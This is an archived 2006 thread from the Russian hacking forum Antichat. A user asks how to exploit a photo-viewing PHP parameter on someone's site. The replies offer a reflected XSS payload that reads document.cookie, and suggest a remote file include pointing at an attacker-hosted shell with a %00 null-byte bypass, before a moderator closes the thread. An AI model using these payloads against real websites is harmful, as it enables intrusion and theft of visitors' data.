HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу Можно ли что-то с этим сделать?
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Можно ли что-то с этим сделать?
  #1  
Старый 27.03.2006, 23:42
FoGorm
Познающий
Регистрация: 04.01.2006
Сообщений: 55
С нами: 10709084

Репутация: 10
По умолчанию Можно ли что-то с этим сделать?
Ребятки помогите, подскажите можно ли что-то сделать, если есть такое:

showfoto.php?foto=/images/img.gif
Вот такая ссылка на картинку..

Когда пишу

showfoto.php?foto=">

То выводит, что картинки нету и " border=0>

Можно ли что-то прописать вредное?
𝕏 Twitter Reddit Telegram Копировать ссылку
 

  #2  
Старый 27.03.2006, 23:44
vectorg
Постоянный
Регистрация: 07.08.2005
Сообщений: 386
С нами: 10925666

Репутация: 454
По умолчанию
xxs


showfoto.php?foto="><script>alert(document.cookie) </script>
 

  #3  
Старый 27.03.2006, 23:47
qBiN
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
С нами: 11212166

Репутация: 182


По умолчанию
возможно php-include
 

  #4  
Старый 27.03.2006, 23:53
FoGorm
Познающий
Регистрация: 04.01.2006
Сообщений: 55
С нами: 10709084

Репутация: 10
По умолчанию
VectorG
XSS меня не сильно интересует, т.к. на сайте нету авторизации, вообщим нету и кукисов... так что воровать их бесмысленно )
 

  #5  
Старый 27.03.2006, 23:54
FoGorm
Познающий
Регистрация: 04.01.2006
Сообщений: 55
С нами: 10709084

Репутация: 10
По умолчанию
qBiN, поделишь пожалуйста подробностями.
 

  #6  
Старый 28.03.2006, 00:03
qBiN
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
С нами: 11212166

Репутация: 182


По умолчанию
Цитата:
qBiN, поделишь пожалуйста подробностями.
Во-первых будешь так называть темы получишь по башке,я модер нервный...
Во-вторых повторяю я модер нервный и не люблю переделывать два сообщения одного пользователя в одно,поэтому советую тебе сделать это(либо это сделаю я,понизив тебе репу)
В третьих RTFM
В четвертых ничо конкретного сказать не могу,скрипт не видел.
зы:вот такой я злой :-)
 

  #7  
Старый 28.03.2006, 00:03
vectorg
Постоянный
Регистрация: 07.08.2005
Сообщений: 386
С нами: 10925666

Репутация: 454
По умолчанию
Цитата:
поделишь пожалуйста подробностями.
ссылку в студиу или в приват мне
телепатов нет!
 

  #8  
Старый 29.03.2006, 22:44
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
С нами: 11517446

Репутация: 2258


По умолчанию
Цитата:
Сообщение от FoGorm  
qBiN, поделишь пожалуйста подробностями.
showfoto.php?foto=/images/img.gif вместо ентого подставить showfoto.php?foto=http://адрес_твоего_шелла_на_хости нге_без_пхп хотя я думаю скрипт инклудит токо картинки..но %00 может обойти хотя древняя весчь
Матвей нехарашо!)
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
 

  #9  
Старый 31.03.2006, 00:10
qBiN
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
С нами: 11212166

Репутация: 182


По умолчанию
Автор спит тему закрываю ибо нет информативности, да и к форумам не относится.
 
Закрытая тема



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Наша служба и опасна и трудна) Copyright_2000 Болталка 10 28.05.2008 19:20
Сексуальные новости 2003 года Рогатый Трупоед Болталка 9 23.10.2007 00:24
Ru.phreak Faq silveran Электроника и Фрикинг 0 21.07.2005 10:20
В форуме ВВ-теги включены, но фильтруються "javascript, onclick.." Что можно сделать? Уязвимости CMS / форумов 3 16.09.2004 01:32



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.